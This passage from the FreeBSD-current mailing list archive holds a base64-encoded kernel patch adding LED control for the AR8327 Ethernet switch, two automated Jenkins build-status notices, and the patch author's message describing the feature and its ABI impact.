LDI2IEBAIGFyc3dpdGNoX2F0dGFjaF9waHlzKHN0cnVjdCBhcnN3aXRjaF9zb2Z0YyAqc2MpCiAJ CQlkZXZpY2VfcHJpbnRmKHNjLT5zY19kZXYsCiAJCQkgICAgImF0dGFjaGluZyBQSFkgJWQgZmFp bGVkXG4iLAogCQkJICAgIHBoeSk7CisJCQlyZXR1cm4gKGVycik7CiAJCX0KKworCQlpZiAoQVI4 WDE2X0lTX1NXSVRDSChzYywgQVI4MzI3KSkgeworCQkJaW50IGxlZDsKKwkJCWNoYXIgbGVkbmFt ZVtJRk5BTVNJWis0XTsKKworCQkJZm9yIChsZWQgPSAwOyBsZWQgPCAzOyBsZWQrKykgeworCQkJ CXNwcmludGYobGVkbmFtZSwgIiVzJWRsZWQlZCIsIG5hbWUsIAorCQkJCSAgICBhcnN3aXRjaF9w b3J0Zm9ycGh5KHBoeSksIGxlZCsxKTsKKwkJCQlzYy0+ZGV2X2xlZFtwaHldW2xlZF0uc2MgPSBz YzsKKwkJCQlzYy0+ZGV2X2xlZFtwaHldW2xlZF0ubGVkID0gCisJCQkJICAgIGxlZF9jcmVhdGUo KGxlZF90ICopYXJzd2l0Y2hfbGVkX2Z1bmMsCisJCQkJICAgICZzYy0+ZGV2X2xlZFtwaHldW2xl ZF0sIGxlZG5hbWUpOworCQkJCXNjLT5kZXZfbGVkW3BoeV1bbGVkXS5waHkgPSBwaHk7CisJCQkJ c2MtPmRldl9sZWRbcGh5XVtsZWRdLmxlZG51bSA9IGxlZDsKKwkJCX0KKwkJfQogCX0KLQlyZXR1 cm4gKGVycik7CisJcmV0dXJuICgwKTsKIH0KIAogc3RhdGljIGludApAQCAtNDIyLDcgKzQ1Miw3 IEBAIHN0YXRpYyBpbnQKIGFyc3dpdGNoX2RldGFjaChkZXZpY2VfdCBkZXYpCiB7CiAJc3RydWN0 IGFyc3dpdGNoX3NvZnRjICpzYyA9IGRldmljZV9nZXRfc29mdGMoZGV2KTsKLQlpbnQgaTsKKwlp bnQgaSwgbGVkOwogCiAJY2FsbG91dF9kcmFpbigmc2MtPmNhbGxvdXRfdGljayk7CiAKQEAgLTQz Miw2ICs0NjIsOSBAQCBhcnN3aXRjaF9kZXRhY2goZGV2aWNlX3QgZGV2KQogCQlpZiAoc2MtPmlm cFtpXSAhPSBOVUxMKQogCQkJaWZfZnJlZShzYy0+aWZwW2ldKTsKIAkJZnJlZShzYy0+aWZuYW1l W2ldLCBNX0RFVkJVRik7CisJCWZvciAobGVkPTA7IGxlZCA8IEFSU1dJVENIX05VTV9MRURTOyBs ZWQrKykgCisJCQlpZiAoc2MtPmRldl9sZWRbaV1bbGVkXS5sZWQgIT0gTlVMTCkKKwkJCQlsZWRf ZGVzdHJveShzYy0+ZGV2X2xlZFtpXVtsZWRdLmxlZCk7CiAJfQogCiAJYnVzX2dlbmVyaWNfZGV0 YWNoKGRldik7CkBAIC02ODMsNiArNzE2LDM4IEBAIGFyc3dpdGNoX2dldHBvcnQoZGV2aWNlX3Qg ZGV2LCBldGhlcnN3aXRjaF9wb3J0X3QKIAl9IGVsc2UgewogCQlyZXR1cm4gKEVOWElPKTsKIAl9 CisJCisJaWYgKCFhcnN3aXRjaF9pc19jcHVwb3J0KHNjLCBwLT5lc19wb3J0KSAmJiAKKwkgICAg QVI4WDE2X0lTX1NXSVRDSChzYywgQVI4MzI3KSkgeworCQlpbnQgbGVkOworCQlwLT5lc19ubGVk cyA9IDM7CisKKwkJZm9yIChsZWQgPSAwOyBsZWQgPCBwLT5lc19ubGVkczsgbGVkKyspCisJCXsK KwkJCWludCBzdHlsZTsKKwkJCXVpbnQzMl90IHZhbDsKKwkJCQorCQkJLyogRmluZCB0aGUgcmln aHQgc3R5bGUgZW51bSBmb3Igb3VyIHBhdHRlcm4gKi8KKwkJCXZhbCA9IGFyc3dpdGNoX3JlYWRy ZWcoZGV2LCAKKwkJCSAgICBhcjgzMjdfbGVkX21hcHBpbmdbcC0+ZXNfcG9ydC0xXVtsZWRdLnJl Zyk7CisJCQl2YWwgPSAodmFsPj5hcjgzMjdfbGVkX21hcHBpbmdbcC0+ZXNfcG9ydC0xXVtsZWRd LnNoaWZ0KSYweDAzOworCQkJICAgIAorCQkJZm9yIChzdHlsZSA9IDA7IHN0eWxlIDwgRVRIRVJT V0lUQ0hfUE9SVF9MRURfTUFYOyBzdHlsZSsrKQorCQkJeworCQkJCWlmIChsZWRfcGF0dGVybl90 YWJsZVtzdHlsZV0gPT0gdmFsKSBicmVhazsKKwkJCX0KKwkJCQorCQkJLyogY2FuJ3QgaGFwcGVu ICovCisJCQlpZiAoc3R5bGUgPT0gRVRIRVJTV0lUQ0hfUE9SVF9MRURfTUFYKQorCQkJCXN0eWxl ID0gRVRIRVJTV0lUQ0hfUE9SVF9MRURfREVGQVVMVDsKKwkJCQorCQkJcC0+ZXNfbGVkW2xlZF0g PSBzdHlsZTsKKwkJfQorCX0gZWxzZQorCXsKKwkJcC0+ZXNfbmxlZHMgPSAwOworCX0KKwkKIAly ZXR1cm4gKDApOwogfQogCkBAIC03MjcsNyArNzkyLDcgQEAgYXI4eHh4X3BvcnRfdmxhbl9zZXR1 cChzdHJ1Y3QgYXJzd2l0Y2hfc29mdGMgKnNjLAogc3RhdGljIGludAogYXJzd2l0Y2hfc2V0cG9y dChkZXZpY2VfdCBkZXYsIGV0aGVyc3dpdGNoX3BvcnRfdCAqcCkKIHsKLQlpbnQgZXJyOworCWlu dCBlcnIsIGk7CiAJc3RydWN0IGFyc3dpdGNoX3NvZnRjICpzYzsKIAlzdHJ1Y3QgaWZtZWRpYSAq aWZtOwogCXN0cnVjdCBtaWlfZGF0YSAqbWlpOwpAQCAtNzQ0LDkgKzgwOSwyMCBAQCBhcnN3aXRj aF9zZXRwb3J0KGRldmljZV90IGRldiwgZXRoZXJzd2l0Y2hfcG9ydF90CiAJCQlyZXR1cm4gKGVy cik7CiAJfQogCi0JLyogRG8gbm90IGFsbG93IG1lZGlhIGNoYW5nZXMgb24gQ1BVIHBvcnQuICov CisJLyogRG8gbm90IGFsbG93IG1lZGlhIG9yIGxlZCBjaGFuZ2VzIG9uIENQVSBwb3J0LiAqLwog CWlmIChhcnN3aXRjaF9pc19jcHVwb3J0KHNjLCBwLT5lc19wb3J0KSkKIAkJcmV0dXJuICgwKTsK KwkKKwlpZiAoQVI4WDE2X0lTX1NXSVRDSChzYywgQVI4MzI3KSkKKwl7CisJCWZvciAoaSA9IDA7 IGkgPCAzOyBpKyspCisJCXsJCisJCQlpbnQgZXJyOworCQkJZXJyID0gYXJzd2l0Y2hfc2V0bGVk KHNjLCBwLT5lc19wb3J0LTEsIGksIHAtPmVzX2xlZFtpXSk7CisJCQlpZiAoZXJyKQorCQkJCXJl dHVybiAoZXJyKTsKKwkJfQorCX0KIAogCW1paSA9IGFyc3dpdGNoX21paWZvcnBvcnQoc2MsIHAt PmVzX3BvcnQpOwogCWlmIChtaWkgPT0gTlVMTCkKQEAgLTc1OCw2ICs4MzQsMzQgQEAgYXJzd2l0 Y2hfc2V0cG9ydChkZXZpY2VfdCBkZXYsIGV0aGVyc3dpdGNoX3BvcnRfdAogCXJldHVybiAoaWZt ZWRpYV9pb2N0bChpZnAsICZwLT5lc19pZnIsIGlmbSwgU0lPQ1NJRk1FRElBKSk7CiB9CiAKKy8q CisgKiBsZWQoNCkgY2FsbGJhY2sgZnVuY3Rpb24uICBUaGF0IGFwaSBvbmx5IGtub3dzIG9uL29m ZjsgaWYgeW91IHdhbnQgdG8KKyAqIHJlc2V0IGJhY2sgdG8gZGVmYXVsdHMsIHlvdSdsbCBuZWVk IHRvIHVzZSBldGhlcnN3aXRjaGNmZy4KKyAqLworc3RhdGljIHZvaWQgCithcnN3aXRjaF9sZWRf ZnVuYyhzdHJ1Y3QgYXJzd2l0Y2hfZGV2X2xlZCogZGV2X2xlZCwgaW50IG9ub2ZmKQoreworCWFy c3dpdGNoX3NldGxlZChkZXZfbGVkLT5zYywgZGV2X2xlZC0+cGh5LCBkZXZfbGVkLT5sZWRudW0s IAorCSAgICBvbm9mZiA/IEVUSEVSU1dJVENIX1BPUlRfTEVEX09OIDogRVRIRVJTV0lUQ0hfUE9S VF9MRURfT0ZGKTsKK30KKworc3RhdGljIGludAorYXJzd2l0Y2hfc2V0bGVkKHN0cnVjdCBhcnN3 aXRjaF9zb2Z0YyAqc2MsIGludCBwaHksIGludCBsZWQsIGludCBzdHlsZSkKK3sKKwlpbnQgc2hp ZnQ7CisKKwlpZiAocGh5IDwgMCB8fCBwaHkgPiBzYy0+bnVtcGh5cykKKwkJcmV0dXJuIEVJTlZB TDsKKworCWlmIChzdHlsZSA8IDAgfHwgc3R5bGUgPiBFVEhFUlNXSVRDSF9QT1JUX0xFRF9NQVgp CisJCXJldHVybiAoRUlOVkFMKTsKKyAgICAKKwlzaGlmdCA9IGFyODMyN19sZWRfbWFwcGluZ1tw aHldW2xlZF0uc2hpZnQ7CisJcmV0dXJuIChhcnN3aXRjaF9tb2RpZnlyZWcoc2MtPnNjX2Rldiwg CisJICAgIGFyODMyN19sZWRfbWFwcGluZ1twaHldW2xlZF0ucmVnLCAKKwkgICAgMHgwMyA8PCBz aGlmdCwgbGVkX3BhdHRlcm5fdGFibGVbc3R5bGVdIDw8IHNoaWZ0KSk7Cit9CisKIHN0YXRpYyB2 b2lkCiBhcnN3aXRjaF9zdGF0Y2hnKGRldmljZV90IGRldikKIHsKSW5kZXg6IHN5cy9kZXYvZXRo ZXJzd2l0Y2gvYXJzd2l0Y2gvYXJzd2l0Y2hfODMyNy5jCj09PT09PT09PT09PT09PT09PT09PT09 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0KLS0tIHN5cy9kZXYv ZXRoZXJzd2l0Y2gvYXJzd2l0Y2gvYXJzd2l0Y2hfODMyNy5jCShyZXZpc2lvbiAzMDM1MzgpCisr KyBzeXMvZGV2L2V0aGVyc3dpdGNoL2Fyc3dpdGNoL2Fyc3dpdGNoXzgzMjcuYwkod29ya2luZyBj b3B5KQpAQCAtNzUsNiArNzUsMzYgQEAKICAqIGxlYWQgdG8gdHJhZmZpYyBzdG9ybXMvbG9vcHMu CiAgKi8KIAorLyogTWFwIHBvcnQrbGVkIHRvIHJlZ2lzdGVyK3NoaWZ0ICovCitzdHJ1Y3QgYXI4 MzI3X2xlZF9tYXBwaW5nIGFyODMyN19sZWRfbWFwcGluZ1tBUjgzMjdfTlVNX1BIWVNdW0VUSEVS U1dJVENIX1BPUlRfTUFYX0xFRFNdID0KK3sKKwl7CS8qIFBIWTAgKi8KKwkJe0FSODMyN19SRUdf TEVEX0NUUkwwLCAxNCB9LAorCQl7QVI4MzI3X1JFR19MRURfQ1RSTDEsIDE0IH0sCisJCXtBUjgz MjdfUkVHX0xFRF9DVFJMMiwgMTQgfQorCX0sCisJewkvKiBQSFkxICovCisJCXtBUjgzMjdfUkVH X0xFRF9DVFJMMywgOCAgfSwKKwkJe0FSODMyN19SRUdfTEVEX0NUUkwzLCAxMCB9LAorCQl7QVI4 MzI3X1JFR19MRURfQ1RSTDMsIDEyIH0KKwl9LAorCXsJLyogUEhZMiAqLworCQl7QVI4MzI3X1JF R19MRURfQ1RSTDMsIDE0IH0sCisJCXtBUjgzMjdfUkVHX0xFRF9DVFJMMywgMTYgfSwKKwkJe0FS ODMyN19SRUdfTEVEX0NUUkwzLCAxOCB9CisJfSwKKwl7CS8qIFBIWTMgKi8KKwkJe0FSODMyN19S RUdfTEVEX0NUUkwzLCAyMCB9LAorCQl7QVI4MzI3X1JFR19MRURfQ1RSTDMsIDIyIH0sCisJCXtB UjgzMjdfUkVHX0xFRF9DVFJMMywgMjQgfQorCX0sCisJewkvKiBQSFk0ICovCisJCXtBUjgzMjdf UkVHX0xFRF9DVFJMMCwgMzAgfSwKKwkJe0FSODMyN19SRUdfTEVEX0NUUkwxLCAzMCB9LAorCQl7 QVI4MzI3X1JFR19MRURfQ1RSTDIsIDMwIH0KKwl9Cit9OworCiBzdGF0aWMgaW50CiBhcjgzMjdf dmxhbl9vcChzdHJ1Y3QgYXJzd2l0Y2hfc29mdGMgKnNjLCB1aW50MzJfdCBvcCwgdWludDMyX3Qg dmlkLAogICAgIHVpbnQzMl90IGRhdGEpCkluZGV4OiBzeXMvZGV2L2V0aGVyc3dpdGNoL2Fyc3dp dGNoL2Fyc3dpdGNoXzgzMjcuaAo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Ci0tLSBzeXMvZGV2L2V0aGVyc3dpdGNoL2Fy c3dpdGNoL2Fyc3dpdGNoXzgzMjcuaAkocmV2aXNpb24gMzAzNTM4KQorKysgc3lzL2Rldi9ldGhl cnN3aXRjaC9hcnN3aXRjaC9hcnN3aXRjaF84MzI3LmgJKHdvcmtpbmcgY29weSkKQEAgLTg1LDYg Kzg1LDExIEBAIHN0cnVjdCBhcjgzMjdfcG9ydF9jZmcgewogCXVpbnQzMl90IHJ4cGF1c2U7CiB9 OwogCitleHRlcm4gc3RydWN0IGFyODMyN19sZWRfbWFwcGluZyB7CisJaW50IHJlZzsKKwlpbnQg c2hpZnQ7Cit9IGFyODMyN19sZWRfbWFwcGluZ1tBUjgzMjdfTlVNX1BIWVNdW0VUSEVSU1dJVENI X1BPUlRfTUFYX0xFRFNdOworCiBleHRlcm4Jdm9pZCBhcjgzMjdfYXR0YWNoKHN0cnVjdCBhcnN3 aXRjaF9zb2Z0YyAqc2MpOwogCiAjZW5kaWYJLyogX19BUlNXSVRDSF84MzI3X0hfXyAqLwpJbmRl eDogc3lzL2Rldi9ldGhlcnN3aXRjaC9hcnN3aXRjaC9hcnN3aXRjaHZhci5oCj09PT09PT09PT09 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0K LS0tIHN5cy9kZXYvZXRoZXJzd2l0Y2gvYXJzd2l0Y2gvYXJzd2l0Y2h2YXIuaAkocmV2aXNpb24g MzAzNTM4KQorKysgc3lzL2Rldi9ldGhlcnN3aXRjaC9hcnN3aXRjaC9hcnN3aXRjaHZhci5oCSh3 b3JraW5nIGNvcHkpCkBAIC00OCw2ICs0OCwxNSBAQCB0eXBlZGVmIGVudW0gewogI2RlZmluZSBB UlNXSVRDSF9OVU1fUE9SVFMJTUFYKEFSODMyN19OVU1fUE9SVFMsIEFSOFgxNl9OVU1fUE9SVFMp CiAjZGVmaW5lIEFSU1dJVENIX05VTV9QSFlTCU1BWChBUjgzMjdfTlVNX1BIWVMsIEFSOFgxNl9O VU1fUEhZUykKIAorI2RlZmluZSBBUlNXSVRDSF9OVU1fTEVEUwkzCisKK3N0cnVjdCBhcnN3aXRj aF9kZXZfbGVkIHsKKwlzdHJ1Y3QgYXJzd2l0Y2hfc29mdGMJKnNjOworCXN0cnVjdCBjZGV2CSps ZWQ7CisJaW50CQlwaHk7CisJaW50CQlsZWRudW07Cit9OworCiBzdHJ1Y3QgYXJzd2l0Y2hfc29m dGMgewogCXN0cnVjdCBtdHgJc2NfbXR4OwkJLyogc2VyaWFsaXplIGFjY2VzcyB0byBzb2Z0YyAq LwogCWRldmljZV90CXNjX2RldjsKQEAgLTY2LDYgKzc1LDcgQEAgc3RydWN0IGFyc3dpdGNoX3Nv ZnRjIHsKIAljaGFyCQkqaWZuYW1lW0FSU1dJVENIX05VTV9QSFlTXTsKIAlkZXZpY2VfdAltaWli dXNbQVJTV0lUQ0hfTlVNX1BIWVNdOwogCXN0cnVjdCBpZm5ldAkqaWZwW0FSU1dJVENIX05VTV9Q SFlTXTsKKwlzdHJ1Y3QgYXJzd2l0Y2hfZGV2X2xlZAlkZXZfbGVkW0FSU1dJVENIX05VTV9QSFlT XVtBUlNXSVRDSF9OVU1fTEVEU107CiAJc3RydWN0IGNhbGxvdXQJY2FsbG91dF90aWNrOwogCWV0 aGVyc3dpdGNoX2luZm9fdCBpbmZvOwogCkluZGV4OiBzeXMvZGV2L2V0aGVyc3dpdGNoL2V0aGVy c3dpdGNoLmgKPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09 PT09PT09PT09PT09PT09PT09PQotLS0gc3lzL2Rldi9ldGhlcnN3aXRjaC9ldGhlcnN3aXRjaC5o CShyZXZpc2lvbiAzMDM1MzgpCisrKyBzeXMvZGV2L2V0aGVyc3dpdGNoL2V0aGVyc3dpdGNoLmgJ KHdvcmtpbmcgY29weSkKQEAgLTE0LDcgKzE0LDcgQEAgZXh0ZXJuIGRyaXZlcl90ICAgICAgICAg ZXRoZXJzd2l0Y2hfZHJpdmVyOwogCiBzdHJ1Y3QgZXRoZXJzd2l0Y2hfcmVnIHsKIAl1aW50MTZf dAlyZWc7Ci0JdWludDE2X3QJdmFsOworCXVpbnQzMl90CXZhbDsKIH07CiB0eXBlZGVmIHN0cnVj dCBldGhlcnN3aXRjaF9yZWcgZXRoZXJzd2l0Y2hfcmVnX3Q7CiAKQEAgLTY0LDEwICs2NCwyMyBA QCB0eXBlZGVmIHN0cnVjdCBldGhlcnN3aXRjaF9jb25mIGV0aGVyc3dpdGNoX2NvbmZfdAogI2Rl ZmluZQlFVEhFUlNXSVRDSF9QT1JUX0ZMQUdTX0JJVFMJXAogIlwwMjBcMUNQVVBPUlRcMlNUUklQ VEFHXDNBRERUQUdcNEZJUlNUTE9DS1w1RFJPUFVOVEFHR0VEXDZRaW5RXDdJTkdSRVNTIgogCisj ZGVmaW5lIEVUSEVSU1dJVENIX1BPUlRfTUFYX0xFRFMgMworCitlbnVtIGV0aGVyc3dpdGNoX3Bv cnRfbGVkIHsKKwlFVEhFUlNXSVRDSF9QT1JUX0xFRF9ERUZBVUxULAorCUVUSEVSU1dJVENIX1BP UlRfTEVEX09OLAorCUVUSEVSU1dJVENIX1BPUlRfTEVEX09GRiwKKwlFVEhFUlNXSVRDSF9QT1JU X0xFRF9CTElOSywKKwlFVEhFUlNXSVRDSF9QT1JUX0xFRF9NQVgKK307Cit0eXBlZGVmIGVudW0g ZXRoZXJzd2l0Y2hfcG9ydF9sZWQgZXRoZXJzd2l0Y2hfcG9ydF9sZWRfdDsKKwogc3RydWN0IGV0 aGVyc3dpdGNoX3BvcnQgewogCWludAkJZXNfcG9ydDsKIAlpbnQJCWVzX3B2aWQ7CisJaW50CQll c19ubGVkczsKIAl1aW50MzJfdAllc19mbGFnczsKKwlldGhlcnN3aXRjaF9wb3J0X2xlZF90IGVz X2xlZFtFVEhFUlNXSVRDSF9QT1JUX01BWF9MRURTXTsKIAl1bmlvbiB7CiAJCXN0cnVjdCBpZnJl cQkJZXNfdWlmcjsKIAkJc3RydWN0IGlmbWVkaWFyZXEJZXNfdWlmbXI7Cg== ------=_Part_8622005_1358949567.1469859063414-- From owner-freebsd-current@freebsd.org Sat Jul 30 12:09:58 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id CF15ABA8C72 for ; Sat, 30 Jul 2016 12:09:58 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id BA3491543; Sat, 30 Jul 2016 12:09:58 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id E17171AF; Sat, 30 Jul 2016 12:09:58 +0000 (UTC) Date: Sat, 30 Jul 2016 12:09:58 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org Message-ID: <364624023.70.1469880598260.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <1413790308.67.1469869953900.JavaMail.jenkins@jenkins-9.freebsd.org> References: <1413790308.67.1469869953900.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: Jenkins build is still unstable: FreeBSD_HEAD #505 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkKKb2VAfYQKfu1t7qk4nR5qzUBEI+UqT4BPec4qHVhqUy0FFdq50sMH+3y9bCDNOufctov6VqTNffZ3YXArnZK95YF0OX97fh+E9txYOUX1adc+TikcKjuYpHmL5dE62eaZTI+4A5jnRonskQ1PaoIFz0Kbu4mWzkFsmdiXTraGzomXq4cHUCATA2+K4eDYgjXEQI30z3GOMmmZ4t/+6QGk1cMb/BqMWHbn80AsRCb4tU7Hpd72XLDpsuO7YRP1Q0CjmNAuBOTj+sFiiOe6U9HpqOlQN+iFUvBdZo/ybuy5Kh71cAaYQNL68cYdZJ6binH/DkG3KY/fS7DFYAeuwjwIDAQAB X-Jenkins-Job: FreeBSD_HEAD X-Jenkins-Result: UNSTABLE X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 30 Jul 2016 12:09:58 -0000 See From owner-freebsd-current@freebsd.org Sat Jul 30 15:12:15 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 61314BA8F45 for ; Sat, 30 Jul 2016 15:12:15 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id 4CBE21A82; Sat, 30 Jul 2016 15:12:15 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id 55B011B5; Sat, 30 Jul 2016 15:12:15 +0000 (UTC) Date: Sat, 30 Jul 2016 15:12:15 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org Message-ID: <1787258567.71.1469891535055.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <364624023.70.1469880598260.JavaMail.jenkins@jenkins-9.freebsd.org> References: <364624023.70.1469880598260.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: Jenkins build is still unstable: FreeBSD_HEAD #506 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkKKb2VAfYQKfu1t7qk4nR5qzUBEI+UqT4BPec4qHVhqUy0FFdq50sMH+3y9bCDNOufctov6VqTNffZ3YXArnZK95YF0OX97fh+E9txYOUX1adc+TikcKjuYpHmL5dE62eaZTI+4A5jnRonskQ1PaoIFz0Kbu4mWzkFsmdiXTraGzomXq4cHUCATA2+K4eDYgjXEQI30z3GOMmmZ4t/+6QGk1cMb/BqMWHbn80AsRCb4tU7Hpd72XLDpsuO7YRP1Q0CjmNAuBOTj+sFiiOe6U9HpqOlQN+iFUvBdZo/ybuy5Kh71cAaYQNL68cYdZJ6binH/DkG3KY/fS7DFYAeuwjwIDAQAB X-Jenkins-Job: FreeBSD_HEAD X-Jenkins-Result: UNSTABLE X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 30 Jul 2016 15:12:15 -0000 See From owner-freebsd-current@freebsd.org Sat Jul 30 17:00:49 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id E9BB2BA79D3 for ; Sat, 30 Jul 2016 17:00:49 +0000 (UTC) (envelope-from dnelson_1901@yahoo.com) Received: from nm33.bullet.mail.gq1.yahoo.com (nm33.bullet.mail.gq1.yahoo.com [98.136.217.16]) (using TLSv1 with cipher ECDHE-RSA-RC4-SHA (128/128 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id BD8121164 for ; Sat, 30 Jul 2016 17:00:49 +0000 (UTC) (envelope-from dnelson_1901@yahoo.com) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s2048; t=1469898043; bh=gOSdPAm0JmKyhgpZURAczL8FixIkjYJUrqjn4ePXlrk=; h=Date:From:Reply-To:To:In-Reply-To:References:Subject:From:Subject; b=ciGBNIBs95FTF8y8P4jYR5qKzNSnMnJ+M/9sxwq75uMsY/nMsPhio5lNoLucBqkzC14e/oTK9tpQLR//5VcpAMPPi0BpMEuCOGsEOFWiMTGCykNpA9d7d9ahkzX+FdF4a6z1T1fbevUxtzo75EVzPn9RHk+xzoqnLpOpobKZuIL3wCGWnQTFGAt0UZV9ZGbzoUmMTUHrpwaNiBfcCn3nkYx2nwUYt0n/riCscfQ6JG76W0/L9PmIKoAO7wRFt0L+CIWi6tR+O7XThrDaCjz4eZifE2cgRDOnCYlFDSIU5ahrCHPCMPd0yz9gklwPlnn8ASZCdRRo7uLqTSPDqKDqxg== Received: from [127.0.0.1] by nm33.bullet.mail.gq1.yahoo.com with NNFMP; 30 Jul 2016 17:00:43 -0000 Received: from [216.39.60.183] by nm33.bullet.mail.gq1.yahoo.com with NNFMP; 30 Jul 2016 16:57:44 -0000 Received: from [98.137.12.214] by tm19.bullet.mail.gq1.yahoo.com with NNFMP; 30 Jul 2016 16:57:44 -0000 Received: from [127.0.0.1] by omp1022.mail.gq1.yahoo.com with NNFMP; 30 Jul 2016 16:57:44 -0000 X-Yahoo-Newman-Property: ymail-4 X-Yahoo-Newman-Id: 303973.65347.bm@omp1022.mail.gq1.yahoo.com X-YMail-OSG: jdnxWWcVM1lMZhfCLw4J.TqHHsuhUatbMEJzOsiXoppYX802FbxRIxkr4CSADfB Z3Vu27Z6vGVX3TgsoQEkrokBQP9U_V.zu0O9IeGscbXcNAY7eZXv8buF0KSEVB2iKZGOZqjmvrYK oAOOT4ZYnQpy3VbPgPZ0_KlZcJ0CQKHgRkE.4Y5FhtfpO.o.A2SO1QdebW2Fg2EkoYSA4zO_8BKd 5TDyyFZd_RCV8P4vJN616Wk2m1PKUoqXQoG5yHoocxO3hskslmCRPUB223UWSCXHCojy96Y0YAv7 d8.GFOLkr67_j_GkIl5Toe78vclbCXpMNaKtFMuID_FI_Ph4a0UAvRgfUr3N9J9n.rzSy83r3Rw9 ymLRkEa6SleyunDip5LOX7XfXNay7AlrcSAIOAyf8XBN8gxr3eHr2g.zLhzyJ0XHqkoqwD.VcsIs C7opV1Hq88HyXyFZhkySFsAZ7wgYqK5a.MFyfCJrkzl7RLAI3fvO.JjcMGSsW3QFfMcN4BkDDlgk WRrViCazu.yVvVw9azI7vyo8GmLzmznp9GDw6wkMWXbStEQ-- Received: from jws10745.mail.gq1.yahoo.com by sendmailws131.mail.gq1.yahoo.com; Sat, 30 Jul 2016 16:57:43 +0000; 1469897863.948 Date: Sat, 30 Jul 2016 16:57:43 +0000 (UTC) From: Dan Nelson Reply-To: Dan Nelson To: "freebsd-current@freebsd.org" Message-ID: <1332109611.8713594.1469897863672.JavaMail.yahoo@mail.yahoo.com> In-Reply-To: <315070490.8622006.1469859063414.JavaMail.yahoo@mail.yahoo.com> References: <315070490.8622006.1469859063414.JavaMail.yahoo.ref@mail.yahoo.com> <315070490.8622006.1469859063414.JavaMail.yahoo@mail.yahoo.com> Subject: Re: AR8327 Etherswitch led control patch MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Mailman-Approved-At: Sat, 30 Jul 2016 18:56:44 +0000 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 30 Jul 2016 17:00:50 -0000 The patch has also been filed as https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=211462 . ----- Original Message ----- From: Dan Nelson To: "freebsd-current@freebsd.org" Sent: Saturday, July 30, 2016 1:11 AM Subject: AR8327 Etherswitch led control patch I got a TP-Link WDR4300 recently, flashed it to FreeBSD, and decided that I needed to be able to control all the LEDs on the front :) As a start, attached is a patch that allows you to manage the five LEDs connected to the Atheros AR8327 switch chip it uses. It extends the etherswitch API, allowing up to three LEDs per port to be set to on, off, cyclic blink, or default (flash on activity for the 8327). I added an "led" subcommand to the etherswitchcfg tool for full control, and also added led(4) nodes for basic on/off control. This particular switch seems to only notice changes to the LED registers twice per second, so it's no good for smooth animation, but it works just fine as a 5-bit progress bar or error display. This does break ABI compatibility of the etherswitch ioctl because of new elements in the structure. The code should be generic enough to apply easily to other etherswitch chips. Comments and suggestions welcome. -- Dan Nelson dnelson_1901@yahoo.com From owner-freebsd-current@freebsd.org Sat Jul 30 19:14:12 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id EF71EBA98E8 for ; Sat, 30 Jul 2016 19:14:12 